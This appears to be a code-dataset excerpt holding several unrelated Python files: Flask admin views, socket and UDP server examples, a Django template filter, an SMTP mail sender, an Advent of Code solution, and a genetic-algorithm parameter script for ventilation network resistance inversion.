The notify service is running!', 'success')\n            # Flash msg when config has been changed by user\n            if not scheduler.get_jobs() and config_changed:\n                current_app.logger_admin.info(f'Notification service config has been changed by '\n                                              f'\"{current_user.username}\"')\n                flash('The notification service config has been changed!', 'success')\n        if form.errors:\n            flash_errors(form)\n    # Determine whether some scheduler jobs exist - if True, notification service is running\n    service_run = True if scheduler.get_jobs() else False\n    return render_template('admin/notify.html', service_run=service_run, **notify_config)\n\n\n@admin_bp.route('/logs')\n@login_required\n@admin_required\ndef logs():\n    \"\"\"\n    List app's logs.\n    \"\"\"\n    logs_per_page = 12\n    page = request.args.get('page', 1, type=int)\n    if not request.args or (request.args.get('col') == 'time' and request.args.get('dir') == 'desc'):\n        logs = Log.query.order_by(desc(Log.time)).paginate(page, logs_per_page, True)\n    elif request.args.get('col') == 'time' and request.args.get('dir') == 'desc':\n        logs = Log.query.order_by(desc(Log.time)).paginate(page, logs_per_page, True)\n    elif request.args.get('col') == 'time' and request.args.get('dir') == 'asc':\n        logs = Log.query.order_by(asc(Log.time)).paginate(page, logs_per_page, True)\n    elif request.args.get('col') == 'log_name' and request.args.get('dir') == 'desc':\n        logs = Log.query.order_by(desc(Log.log_name)).paginate(page, logs_per_page, True)\n    elif request.args.get('col') == 'log_name' and request.args.get('dir') == 'asc':\n        logs = Log.query.order_by(asc(Log.log_name)).paginate(page, logs_per_page, True)\n    elif request.args.get('col') == 'level' and request.args.get('dir') == 'asc':\n        logs = Log.query.order_by(asc(Log.level)).paginate(page, logs_per_page, True)\n    elif request.args.get('col') == 'level' and request.args.get('dir') == 'desc':\n        logs = Log.query.order_by(desc(Log.level)).paginate(page, logs_per_page, True)\n    else:\n        abort(404)\n    if not request.args:\n        session['prev_endpoint'] = url_for('admin_bp.logs')\n    else:\n        session['prev_endpoint'] = url_for('admin_bp.logs',\n                                           col=request.args.get('col'),\n                                           page=page)\n    next_url = url_for('admin_bp.logs',\n                       col=request.args.get('col', 'time'),\n                       dir=request.args.get('dir', 'desc'),\n                       page=logs.next_num) if logs.has_next else None\n    prev_url = url_for('admin_bp.logs',\n                       col=request.args.get('col', 'time'),\n                       dir=request.args.get('dir', 'desc'),\n                       page=logs.prev_num) if logs.has_prev else None\n    return render_template('admin/logs.html',\n                           logs=logs,\n                           next_url=next_url,\n                           prev_url=prev_url,\n                           logs_per_page=logs_per_page)\n\n\n@admin_bp.route('/logs_clear')\n@login_required\n@admin_required\ndef logs_clear():\n    \"\"\"\n    Clear app's logs.\n    \"\"\"\n    if request.args.get('range') == 'all':\n        db.session.query(Log).delete()\n        db.session.commit()\n    elif request.args.get('range') == 'day1':\n        Log.delete_expired(1)\n    elif request.args.get('range') == 'week1':\n        Log.delete_expired(7)\n    elif request.args.get('range') == 'week2':\n        Log.delete_expired(14)\n    elif request.args.get('range') == 'month1':\n        Log.delete_expired(31)\n    elif request.args.get('range') == 'month3':\n        Log.delete_expired(90)\n    else:\n        abort(404)\n    flash('Logs from the selected timeframe have been deleted!', 'success')\n    return redirect(url_for('admin_bp.logs'))\n\n\n@admin_bp.route('/search_engine', methods=['GET', 'POST'])\n@cancel_click('admin_bp.dashboard')\n@login_required\n@admin_required\ndef search_engine():\n    \"\"\"\n    View shows search engine's status and config in admin dashboard.\n    
\"\"\"\n search_service_status = False if not current_app.elasticsearch or not current_app.elasticsearch.ping() else True\n search_url = current_app.config.get('ELASTICSEARCH_URL')\n # Get elasticsearch node info\n search_config_data = {}\n if search_service_status:\n response = requests.get(search_url)\n search_config_data = json.loads(response.text)\n if search_config_data.get('version'):\n search_service_version = search_config_data.get('version').get('number', 'No data')\n search_service_build_type = search_config_data.get('version').get('build_type', 'No data')\n else:\n search_service_version = search_config_data.get('version', 'No data')\n search_service_build_type = search_config_data.get('version', 'No data')\n search_config = {\n 'search_url': search_url,\n 'search_service_status': search_service_status,\n 'search_service_version': search_service_version,\n 'search_service_build_type': search_service_build_type,\n }\n if request.method == \"POST\":\n # Reindex on demand - add all events and logs from the db to the search index in elasticsearch.\n Event.reindex()\n Log.reindex()\n flash(f'Data from database have been reindexed!', 'success')\n return render_template('admin/search_engine.html', **search_config)\n\n\n@admin_bp.route('/search')\n@login_required\n@admin_required\ndef search():\n \"\"\"\n Search engine for admin blueprint.\n \"\"\"\n if not current_app.elasticsearch or not current_app.elasticsearch.ping():\n flash(f'Sorry! No connection with search engine!', 'danger')\n return redirect(session.get('prev_endpoint'))\n # Fetch all current event's authors from db.\n page = request.args.get('page', 1, type=int)\n items_per_page = 10\n try:\n if request.args.get('sub') == 'events':\n events, total = Event.search(request.args.get('q'), page, items_per_page)\n items_on_current_page = events.count()\n elif request.args.get('sub') == 'logs':\n logs, total = Log.search(request.args.get('q'), page, items_per_page)\n items_on_current_page = logs.count()\n else:\n abort(404)\n except (elasticsearch.exceptions.RequestError, TypeError):\n abort(404)\n next_url = url_for('admin_bp.search', sub=request.args.get('sub'), q=request.args.get('q'), page=page + 1) \\\n if total > page * items_per_page else None\n prev_url = url_for('admin_bp.search', sub=request.args.get('sub'), q=request.args.get('q'), page=page - 1) \\\n if page > 1 else None\n # Pagination for search results\n page_last = int(total / items_per_page) + 1 if (total / items_per_page % 1) != 0 else int(total / items_per_page)\n pagination = {\n 'page_first': 1,\n 'page_current': page,\n 'page_last': page_last,\n 'page_prev': page - 1 if page > 1 else None,\n 'page_next': page + 1 if total > page * items_per_page else None,\n 'items_per_page': items_per_page,\n }\n # Remember additional URL in session, if there is only one event on page - for event deactivation feature\n if session.get('prev_endpoint_del'):\n del session['prev_endpoint_del']\n if items_on_current_page == 1 and not page == 1:\n session['prev_endpoint_del'] = url_for('admin_bp.search',\n sub=request.args.get('sub'),\n q=request.args.get('q'),\n page=page - 1)\n # Remember current url in session (for back-redirect)\n if not request.args.get('page'):\n session['prev_endpoint'] = url_for('admin_bp.search',\n sub=request.args.get('sub'),\n q=request.args.get('q'))\n else:\n session['prev_endpoint'] = url_for('admin_bp.search',\n sub=request.args.get('sub'),\n q=request.args.get('q'),\n page=request.args.get('page'))\n if request.args.get('sub') == 'events':\n return 
render_template('admin/search.html',\n title='Search',\n events=events,\n total=total,\n next_url=next_url,\n prev_url=prev_url,\n **pagination)\n elif request.args.get('sub') == 'logs':\n return render_template('admin/search.html',\n title='Search',\n logs=logs,\n total=total,\n next_url=next_url,\n prev_url=prev_url,\n **pagination)\n\n\n@admin_bp.route('/dashboard')\n@login_required\n@admin_required\ndef dashboard():\n # Data fetched from db\n users_count = User.query.count()\n standard_users_count = User.query.filter(User.role_id == 2).count()\n admin_users_count = User.query.filter(User.role_id == 1).count()\n events_active = Event.query.filter(Event.is_active == True).count()\n events_notactive = Event.query.filter(Event.is_active == False).count()\n events_count = Event.query.count()\n # Data for chart - 'Events created in last 30 days'\n today = datetime.datetime.today()\n events = Event.query.with_entities(Event.time_creation).filter(Event.time_creation <= today,\n Event.time_creation >= today - datetime.timedelta(days=31)).order_by('time_creation').all()\n event_dates = [event[0].date() for event in events]\n chart_data = {}\n for day in event_dates:\n new = chart_data.get(day, 0)\n chart_data[day] = new + 1\n events_labels = chart_data.keys()\n events_values = chart_data.values()\n\n if not current_app.elasticsearch or not current_app.elasticsearch.ping():\n search_status = False\n else:\n search_status = True\n notification_status = True if scheduler.get_jobs() else False\n data = {\n 'users_count': users_count,\n 'standard_users_count': standard_users_count,\n 'admin_users_count': admin_users_count,\n 'events_count': events_count,\n 'search_status': search_status,\n 'notification_status': notification_status,\n 'events_active': events_active,\n 'events_notactive': events_notactive,\n 'events_labels': list(events_labels),\n 'events_values': list(events_values),\n }\n return render_template('admin/dashboard.html', **data)\n","sub_path":"reminder/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":35206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24651774","text":"#!/usr/bin/env python\n\n\"\"\"\nrecursion in an interactive loop\n\nThis code will work -- but not a great idea!\n\"\"\"\n\nimport sys\n\n\ndef mainloop():\n while True:\n ans = input('type \"a\", \"b\", or \"quit\"')\n if ans == \"a\":\n print(\"you typed a\")\n elif ans == \"b\":\n print(\"going to second loop\")\n second_loop()\n print(\"back from second loop\")\n elif ans[0] == \"q\":\n print(\"quitting\")\n # break\n sys.exit() # what if I use the break, rather than the exit()?\n elif ans[0] == \"r\": # here to test recursion...\n raise Exception()\n # else: # no expected response -- start the loop again\n # mainloop()\n\n\ndef second_loop():\n ans = \"\"\n while not ans == \"g\":\n ans = input('second loop: type \"a\", \"b\", or \"go back')\n if ans == \"a\":\n print(\"you typed a\")\n elif ans == \"b\":\n second_loop()\n # elif ans[0] == \"g\":\n # return\n # break\n # mainloop()\n\n\n\nif __name__ == \"__main__\":\n mainloop()\n\n\n\n\n\n","sub_path":"examples/Session04/recursive_mainloop.py","file_name":"recursive_mainloop.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"81248039","text":"\"\"\"\n基于select 的IO多路复用并发模型\n重点代码 !\n\"\"\"\nfrom socket import *\nfrom select import select\n\n# 全局变量\nHOST = \"0.0.0.0\"\nPORT = 8889\nADDR 
= (HOST,PORT)\n\n# 创建tcp套接字\ntcp_socket = socket()\ntcp_socket.bind(ADDR)\ntcp_socket.listen(5)\n\n# 设置为非阻塞\ntcp_socket.setblocking(False)\n\n# IO对象监控列表\nrlist = [tcp_socket] # 初始监听对象\nwlist = []\nxlist = []\n\n# 循环监听\nwhile True:\n # 对关注的IO进行监控\n rs,ws,xs = select(rlist,wlist,xlist)\n # 对返回值rs 分情况讨论 监听套接字 客户端连接套接字\n for r in rs:\n if r is tcp_socket:\n # 处理客户端连接\n connfd, addr = r.accept()\n print(\"Connect from\", addr)\n connfd.setblocking(False) # 设置非阻塞\n rlist.append(connfd) # 添加到监控列表\n else:\n # 收消息\n data = r.recv(1024)\n if not data:\n # 客户端退出\n rlist.remove(r) # 移除关注\n r.close()\n continue\n print(data.decode())\n # r.send(b'OK')\n wlist.append(r) # 放入写列表\n\n for w in ws:\n w.send(b\"OK\") # 发送消息\n wlist.remove(w) # 如果不移除会不断的写\n\n\n\n\n\n\n","sub_path":"month_02/teacher/day16/select_server.py","file_name":"select_server.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114011301","text":"from django import template\nimport pprint\nfrom django.forms import ChoiceField\nregister = template.Library()\n\n@register.filter\ndef data_verbose(field):\n\t\"\"\"\n\tReturns field's data or it's verbose version \n\tfor a field with choices defined.\n\n\tUsage::\n\n\t\t{% load data_verbose %}\n\t\t{{form.some_field|data_verbose}}\n\t\"\"\"\n\tvalue = field.value()\n\tif isinstance(field.field, ChoiceField):\n\t\tfor (val, desc) in field.field.choices: \n\t\t\tif val == value: \n\t\t\t\treturn desc \n\t\n\treturn value","sub_path":"ewtisite/templatetags/data_verbose.py","file_name":"data_verbose.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"446943208","text":"__author__ = \"Alejo Herrera\"\n\nprint('Analisis de Texto')\nprint('=' * 80)\n\nvocales = 'aeiouAEIOU'\nclet = cpal = cpecv = palabras_li = palabras_menos_4 = 0\nemp_conso = tiene_li = False\ncar_ant = ''\ntexto = input('Ingrese el texto a analizar, separados por blancos y termina '\n 'en punto: ')\nfor caracter in texto:\n\n if caracter == ' ' or caracter == '.':\n if clet > 0:\n cpal += 1\n if emp_conso and car_ant in vocales:\n cpecv += 1\n emp_conso = False\n\n if tiene_li:\n palabras_li += 1\n tiene_li = False\n\n if clet < 4:\n palabras_menos_4 += 1\n clet = 0\n else:\n clet += 1\n if clet == 1:\n if caracter not in vocales:\n emp_conso = True\n\n elif clet >= 3:\n if car_ant == 'l' and caracter == 'i':\n tiene_li = True\n\n car_ant = caracter\n\nif cpal > 0:\n print('Hay', cpecv, ' palabras en el texto que empiezan con consonante '\n 'y terminan con vocal')\n print('Hay', palabras_li, 'palabras en el texto que poseen la secuenci '\n '\"li\" a partir de la tercer letra')\n por = palabras_menos_4 * 100 / cpal\n print('Hay', palabras_menos_4, 'palabras en el texto con menos de 4 '\n 'letras y representan el', por,\n '% de palabras del texto')\nelse:\n print('No se ha ingresado un texto para analizar')","sub_path":"Guía de Ejercicios Practicos/Guia de Ejercicios Prácticos-Ficha 08/Ej5-ProcesamientodeTexto.py","file_name":"Ej5-ProcesamientodeTexto.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"443225070","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport json\nimport base64\nimport socket\nimport hashlib\nimport asyncio\nimport argparse\nimport datetime\nimport numpy as np\nimport os.path as 
osp\nimport dateutil.parser as dateparser\n\nif sys.version_info < (3, 6):\n    import sha3\n\nparser = argparse.ArgumentParser(\n    description='Simple lightweight UDP server')\nparser.add_argument('--port',\n                    default=10000,\n                    help=\"UDP port to listen on\")\nparser.add_argument('--bufsize',\n                    default=212992,\n                    help=\"Size of input buffer\")\n\nLOGGING_PATH = 'logs'\nUPLOADS_FOLDER = 'uploads'\n# events = []\n\nevents = {}\nfile_uploads = {}\n\n\ndef generate_report(addr):\n    event = events.pop(addr)\n    now = datetime.datetime.now()\n    diff = now - event['initial_time']\n    seqs = sorted(event['seqs'], key=lambda x: x[-1])\n    # print(seqs)\n    # total_seconds() covers deltas longer than one second; .microseconds alone would not\n    print(\"Time elapsed: %gs\" % (diff.total_seconds()))\n    filename = '_'.join([str(i) for i in addr] + [now.isoformat()]) + '.log'\n    lines = ['seq_num,elapsed_time']\n    values = []\n    for seq in seqs:\n        num_seq, send_time, arrival_time = seq\n        time_delta = arrival_time - send_time\n        values.append([int(num_seq), time_delta.total_seconds()])\n        lines.append(','.join([str(num_seq),\n                               str(time_delta.total_seconds())]))\n    values = np.array(values)\n    mean = np.mean(values[:, 1])\n    lines.append('Mean Reception Time: %g' % (mean))\n    lines.append('Lost Objects: %d' % (event['num_messages'] -\n                                       values.shape[0]))\n    lines.append('Total Objects: %d' % (event['num_messages']))\n    lines = '\\n'.join(lines)\n    with open(osp.join(LOGGING_PATH, filename), 'w') as fp:\n        fp.write(lines)\n\n\nclass EchoServerProtocol:\n    def connection_made(self, transport):\n        self.transport = transport\n        # print(self.transport.get_extra_info('socket'))\n        print(bufsize)\n        sock = self.transport.get_extra_info('socket')\n        sock.settimeout(5.0)\n        # snd_bufsize = sock.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)\n        # print(snd_bufsize)\n        sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)\n\n    def datagram_received(self, data, addr):\n        now = datetime.datetime.now()\n        message = data.decode()\n        # print(message)\n        data = json.loads(message)\n\n        if data['type'] == 'MSG':\n            self.handle_msg(data, addr, now)\n        elif data['type'] == 'FILE':\n            self.handle_upload(data, addr)\n        elif data['type'] == 'MD5':\n            self.handle_digest(data, addr)\n\n    def handle_msg(self, data, addr, now):\n        total_seq = data['total_messages']\n        timestamp = data['timestamp']\n        seq = data['sequence_num']\n        message = data['message']\n        if addr not in events:\n            events[addr] = {'num_messages': int(total_seq), 'seqs': [],\n                            'initial_time': now}\n        timestamp = dateparser.parse(timestamp)\n        diff = now - timestamp\n        print(diff.total_seconds() * 1000)  # one-way latency in ms\n        events[addr]['seqs'].append([seq, timestamp, now])\n        print('Received %r from %s - %s' % (message, addr,\n                                            datetime.datetime.now()))\n        if events[addr]['num_messages'] == int(seq):\n            generate_report(addr)\n\n    def handle_upload(self, data, addr):\n        print(data['seq_num'])\n        if addr not in file_uploads:\n            file_uploads[addr] = {'num_seqs': data['total_seq'], 'chunks': [],\n                                  'filename': osp.join(UPLOADS_FOLDER,\n                                                       data['file']),\n                                  'seg_write': 0,\n                                  'md5sum': hashlib.sha3_256()}\n        chunk = base64.b64decode(bytes(data['payload'], 'utf-8'))\n        file_uploads[addr]['chunks'].append([data['seq_num'], chunk])\n        file_uploads[addr]['chunks'] = sorted(file_uploads[addr]['chunks'],\n                                              key=lambda x: x[0])\n        self.write_to_file(addr)\n        self.transport.sendto(b'ACK', addr)\n\n    def write_to_file(self, addr):\n        data = file_uploads[addr]\n        last_seg = data['seg_write']\n        i = 0\n        cur_seg = data['chunks'][i][0]\n        with open(data['filename'], 'ab') as fp:\n            while cur_seg == last_seg + 1:\n                
data['md5sum'].update(data['chunks'][i][1])\n                fp.write(data['chunks'][i][1])\n                i += 1\n                last_seg = cur_seg\n                try:\n                    cur_seg = data['chunks'][i][0]\n                except IndexError:\n                    break\n                # last_seg, cur_seg = cur_seg, cur_seg + 1\n        data['chunks'] = data['chunks'][i:]  # drop only the chunks that were just written\n        data['seg_write'] = last_seg\n\n    def handle_digest(self, data, addr):\n        print(data)\n        print(file_uploads[addr]['seg_write'])\n        md5sum = self.flush_chunks(addr)\n        print(md5sum)\n        # send a single status byte (1 = digest matches, 0 = mismatch)\n        self.transport.sendto(bytes([md5sum == data['payload']]), addr)\n\n    def flush_chunks(self, addr):\n        data = file_uploads[addr]\n        with open(data['filename'], 'ab') as fp:\n            for chunk in data['chunks']:\n                data['md5sum'].update(chunk[1])\n                fp.write(chunk[1])\n        md5sum = data['md5sum'].hexdigest()\n        file_uploads.pop(addr)\n        return md5sum\n\n\nif __name__ == '__main__':\n    try:\n        os.mkdir(LOGGING_PATH)\n    except Exception:\n        pass\n\n    try:\n        os.mkdir(UPLOADS_FOLDER)\n    except Exception:\n        pass\n\n    args = parser.parse_args()\n    HOST, PORT = '0.0.0.0', int(args.port)\n    bufsize = int(args.bufsize)\n    loop = asyncio.get_event_loop()\n    print(\"Starting UDP server\")\n    # One protocol instance will be created to serve all client requests\n    listen = loop.create_datagram_endpoint(\n        EchoServerProtocol, local_addr=(HOST, PORT))\n    # tasks = [loop.create_task(generate_report())]\n    print(\"Now listening on %s:%d\" % (HOST, PORT))\n    print(\"Press Ctrl+C to Stop\")\n    transport, protocol = loop.run_until_complete(listen)\n\n    try:\n        loop.run_forever()\n    except KeyboardInterrupt:\n        pass\n    # print(events)\n    for addr in list(events):  # generate_report() pops from events, so iterate over a copy\n        generate_report(addr)\n    transport.close()\n    loop.close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"456629993","text":"from functools import partial, reduce\nfrom itertools import combinations, filterfalse, tee\nfrom operator import add\n\nweapon_shop = [\n    (\"Dagger\", {'cost': 8, 'damage': 4, 'armor': 0}),\n    (\"Shortsword\", {'cost': 10, 'damage': 5, 'armor': 0}),\n    (\"Warhammer\", {'cost': 25, 'damage': 6, 'armor': 0}),\n    (\"Longsword\", {'cost': 40, 'damage': 7, 'armor': 0}),\n    (\"Greataxe\", {'cost': 74, 'damage': 8, 'armor': 0}),\n]\n\narmor_shop = [\n    (\"Leather\", {'cost': 13, 'damage': 0, 'armor': 1}),\n    (\"Chainmail\", {'cost': 31, 'damage': 0, 'armor': 2}),\n    (\"Splintmail\", {'cost': 53, 'damage': 0, 'armor': 3}),\n    (\"Bandedmail\", {'cost': 75, 'damage': 0, 'armor': 4}),\n    (\"Platemail\", {'cost': 102, 'damage': 0, 'armor': 5}),\n]\n\nring_shop = [\n    (\"Damage +1\", {'cost': 25, 'damage': 1, 'armor': 0}),\n    (\"Damage +2\", {'cost': 50, 'damage': 2, 'armor': 0}),\n    (\"Damage +3\", {'cost': 100, 'damage': 3, 'armor': 0}),\n    (\"Defense +1\", {'cost': 20, 'damage': 0, 'armor': 1}),\n    (\"Defense +2\", {'cost': 40, 'damage': 0, 'armor': 2}),\n    (\"Defense +3\", {'cost': 80, 'damage': 0, 'armor': 3}),\n    (\"None\", {'cost': 0, 'damage': 0, 'armor': 0}),\n]\n\ndef mergewith(f, a, b):\n    merged = {k: a.get(k, b.get(k)) for k in a.keys() ^ b.keys()}\n    merged.update({k: f(a[k], b[k]) for k in a.keys() & b.keys()})\n    return merged\n\ndef all_equipment_combos():\n    for _, weapon in weapon_shop:\n        for _, armor in armor_shop:\n            for combo in combinations((x[1] for x in ring_shop), 2):\n                for rings in [mergewith(add, *combo), combo[1]]:\n                    yield {**reduce(partial(mergewith, add), [weapon, armor, rings]), 'hp': 100}\n\ndef is_winning(b, p):\n    def ttd(p1, p2):\n        q, r = divmod(p1['hp'], max(1, (p2['damage'] - 
p1['armor'])))\n        return q if r == 0 else q + 1\n    return ttd(p, b) >= ttd(b, p)\n\ndef partition(pred, iterable):\n    t1, t2 = tee(iterable)\n    return filter(pred, t1), filterfalse(pred, t2)\n\ndef all_battles(boss):\n    return partition(partial(is_winning, boss), all_equipment_combos())\n\ndef parse_boss(s):\n    hp, dmg, ar = [int(x.split()[-1]) for x in s.split('\\n')]\n    return {'hp': hp, 'damage': dmg, 'armor': ar, 'cost': 0}\n\ndef part1(s):\n    return min(x['cost'] for x in all_battles(parse_boss(s))[0])\n\ndef part2(s):\n    return max(x['cost'] for x in all_battles(parse_boss(s))[1])\n","sub_path":"year2015/day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"120705489","text":"# -*- coding: utf-8 -*-\n\n#Python 3.5.x\n\n#V0.01\nimport os\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nfrom email.mime.application import MIMEApplication\n\nimport json\nimport datetime\nimport time\n\nimport config\n\n__metaclass__ = type\n\n\nclass MySendMail():\n    def sendRes_ByMail(self, plain_msg, attachFiles):\n        \n        temp_email_info = json.loads(config.decryptInfo(config.email_info, config.cryptoKey))\n        \n        # Third-party SMTP service\n        mail_host=temp_email_info['mail_host']  #server settings\n        mail_port=temp_email_info['mail_port']  #server settings\n        mail_user=temp_email_info['mail_user']  #username\n        mail_pass=temp_email_info['mail_pass']  #password\n        sender = temp_email_info['sender']\n        receivers = temp_email_info['receivers'].split(',')  # recipients; can be set to your QQ mailbox or any other mailbox\n        \n        for receiver in receivers:\n            message = MIMEMultipart()\n            message['From'] = Header(sender, 'utf-8')\n            message['To'] = Header(';'.join([receiver]), 'utf-8')\n            subject = 'Tipster Result('+str(datetime.datetime.now())+')'\n            message['Subject'] = Header(subject, 'utf-8')\n            \n            #plain-text part of the body\n            puretext = MIMEText(plain_msg, 'plain', 'utf-8')\n            message.attach(puretext)\n            \n            #add file attachments\n            for attachFile in attachFiles:\n                filepart=MIMEApplication(open(attachFile, 'rb').read())\n                filepart.add_header('Content-Disposition', 'attachment', filename=os.path.basename(attachFile))\n                message.attach(filepart)\n            \n            \n            try:\n                smtpObj = smtplib.SMTP_SSL() \n                smtpObj.connect(mail_host, mail_port)  # SMTP port number from config\n                smtpObj.login(mail_user,mail_pass) \n                smtpObj.sendmail(sender, [receiver], message.as_string())\n                print(\"Mail sent successfully to %s\" % receiver)\n            except Exception as err:\n                print (err)\n                print(\"Error: failed to send mail to %s\" % receiver)\n            \n            time.sleep(30)\n    \n    \n","sub_path":"source/info_output/sendMail.py","file_name":"sendMail.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"221551221","text":"# -*- coding: utf-8 -*-\n\nimport subprocess\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#[理论]求最小值问题FDC趋近于-1,则问题难度较大,趋近于1时难度较小;求最大问题则相反\n\n#坐标轴名称词典\n#1)可变参数名称 -->坐标轴名称映射\n#2)其它名称映射,例如一些自定义数据(最优适应度,平均适应度等)\n#注1:只有可变参数1)才能用于RunVNR函数中的name参数!!!\n#注2:如果将来需要坐标轴的文字显示中文,直接修改axisNames的内容即可\naxisNames = {\n    #1)可变参数名称(从globalParams词典中提出来的)\n    'popSize':'Population Size',\n    'maxGen':'Max Generation',\n    'steadyGen':'Steady Generation',\n    'pCross':'Crossover Rate',\n    'pMut':'Mutate Rate',\n    #其它可变参数后续考察后再添加\n    #...\n\n    #2)其它名称映射\n    'generation':'Generation',\n    'best_fitness':'Best Fitness',\n    'average_fitness':'Average Fitness',\n    'stdev_fitness':'Stdev Fitness',\n    'fdc_fitness':'Fitness Distance Correlation',\n    'svr':'Variance of R',\n\n    #3)并行计算配置文件\n    
'schema':'PEO Schema XML File',\n 'dataFile':'Data File'\n}\n\n#全局进化参数(默认进化参数)词典\nglobalParams = {\n #不打印帮助信息\n 'help':0,\n\n #种群个数\n 'popSize':20,\n\n #7种选择策略\n #如果是求最小优化问题,不能使用轮盘赌选择(Roulette)\n #通风系统阻力系数反演问题(VNR)是最小优化问题\n # 1) DetTour -- 竞赛选择[2, posSize/2]\n 'tsize':2,\n # 2) StochTour -- 随机竞赛选择[0.5, 1]\n 'trate':1.0,\n # 3) Ranking i -- 排序选择\n # (a)Ranking选择参数: 选择压力(1,2]\n 'pressure':2.0,\n # (b)Ranking选择参数: 指数(0,+inf)\n 'exponent':1.0,\n # 4) Sequential(ordered) 顺序选择(将种群的个体排序后依次进行选择)\n # 5) Sequential(unordered) 乱序选择(将种群的个体打乱后依次进行选择)\n # 6) Roulette -- 轮盘赌选择\n # 7) Random -- 随机选择\n #选择策略(使用序号[1,7]表示使用哪一个选择策略)\n #默认使用DetTour\n 'selection':2,\n\n #这3个选项很少用到,保持默认值即可\n #是否统计适应度函数的计算次数\n 'useEval':0,\n #是否统计适应度函数的计算时间\n 'useTime':0,\n #控制台打印适应度统计数据(最优,平均,方差,FDC)\n #注:修改了EO源代码,因此fileBestStat参数可以记录FDC数据了\n 'printBestStat':0,\n\n #序列化路径\n 'resDir':'Res',\n #是否清空文件夹(${resDir})\n 'eraseDir':1,\n #序列化记录适应度统计数据(最优,平均,方差,FDC)\n #注:修改了EO源代码,因此fileBestStat参数可以记录FDC数据了\n 'fileBestStat':1,\n\n #废除!!!\n #暂时不需要自定义,因为可以直接在EO的源代码中进行修改\n ##序列化记录FDC统计数据\n #'fileFDCStat':1,\n ##FDC(Fitness Distance Correlation,适应度-距离相关系数)\n ##FDC需要一种计算距离的方法,目前有3种计算距离方法:\n ##1) QuadDistance -- 欧拉距离(两个染色体每个变量差值的平方和,最后开平方)\n ##2) HammingDistance -- 汉明距离(两个染色体每个变量差值的绝对值总和)\n ##3) FitnessDistance -- 适应度距离(两个染色体的适应度差值的绝对值)\n #fdcDist = 1\n\n #保存种群信息的频率(每隔多少代)\n #由resDir参数指定保存路径\n #文件名:generation1.sav generation20.sav generation40.sav generation100.sav 等等\n #-1 -- 表示不记录\n # 0 -- 表示只记录最后一代\n # n -- 表示每隔n代记录一次\n 'saveFrequency':0,\n\n #最大进化代数\n 'maxGen':200,\n #稳定进化代数(种群最优个体的适应度多少代没有明显改进即停止进化)\n 'steadyGen':100,\n\n #交叉率\n 'pCross':0.6,\n #变异率\n 'pMut':0.1,\n\n #3个实数编码交叉算子\n #alpha变量暂时不明白是什么意思,用于2个代数交叉算子(SegmentCrossOver 和 HypercubeCrossOver)\n #alpha -- [0,1]\n 'alpha':0.0,\n #1) SegmentCrossOver\n 'segmentRate':1,\n #2) HypercubeCrossOver\n 'hypercubeRate':1,\n #3) 作用机理类似均匀变异的交叉算子\n 'uxoverRate':1,\n\n #3个实数编码变异算子\n #epsilon参数用于uniformMut和detMut\n 'epsilon':0.001,\n #1) UniformMutator\n 'uniformMutRate':1,\n #2) DetMutator\n 'detMutRate':1,\n #3) 高斯变异(正态分布变异)\n 'normalMutRate':1,\n #sigma和pNormal是高斯变异的2个参数\n 'sigma':0.3,\n 'pNormal':1.0,\n \n #并行参数及数据文件\n 'schema':'vnr_schema.xml',\n 'dataFile':'vnr_data.txt',\n 'debug':False\n}\n\n#这些参数并不需要写入到vnr程序中\n#它们都是作为其它参数的变量使用的\n#例如: --selection=DetTour(tsize)\nnotActualParamNames = [\n 'tsize',\n 'trate',\n 'pressure',\n 'exponent',\n]\n\ndef GetParamValue(key, cmdParams):\n value = globalParams[key]\n if key in cmdParams.keys():\n value = cmdParams[key]\n return value\n\ndef SelectionStr(sel, cmdParams):\n if sel == 1:\n return 'DetTour({0})'.format(GetParamValue('tsize',cmdParams))\n elif sel == 2:\n return 'StochTour({0})'.format(GetParamValue('trate',cmdParams))\n elif sel == 3:\n return 'Ranking({0},{1})'.format(GetParamValue('pressure',cmdParams),GetParamValue('exponent',cmdParams))\n elif sel == 4:\n return 'Sequential({0})'.format('ordered')\n elif sel == 5:\n return 'Sequential({0})'.format('unordered')\n elif sel == 6:\n return 'Roulette'\n elif sel == 7:\n return 'Random'\n\ndef SaveFrequencyStr(freq, cmdParams):\n if freq < 0 or freq > GetParamValue('maxGen',cmdParams):\n return '0'\n else:\n return str(freq)\n\ndef MakeCmdParams(cmdParams):\n paramList=[]\n for k, v in cmdParams.iteritems():\n if k in globalParams.keys():\n if k in notActualParamNames:\n continue\n elif k == 'selection':\n paramList.append('--{0}={1}'.format(k, SelectionStr(v,cmdParams)))\n elif k == 'saveFrequency':\n #默认不保存种群信息,注释掉即可\n paramList.append('#--{0}={1}'.format(k, SaveFrequencyStr(v,cmdParams)))\n 
else:\n
                paramList.append('--{0}={1}'.format(k, v))\n
    return paramList\n\n
def MakeGlobalParams(filename):\n
    #create the file\n
    f = open(filename, 'w')\n
    #build the parameter list, roughly: ['--maxGen=200', '--steadyGen=100', '--pCross=0.6', ... ]\n
    paramList = MakeCmdParams(globalParams)\n
    #write it to the file, one parameter per line\n
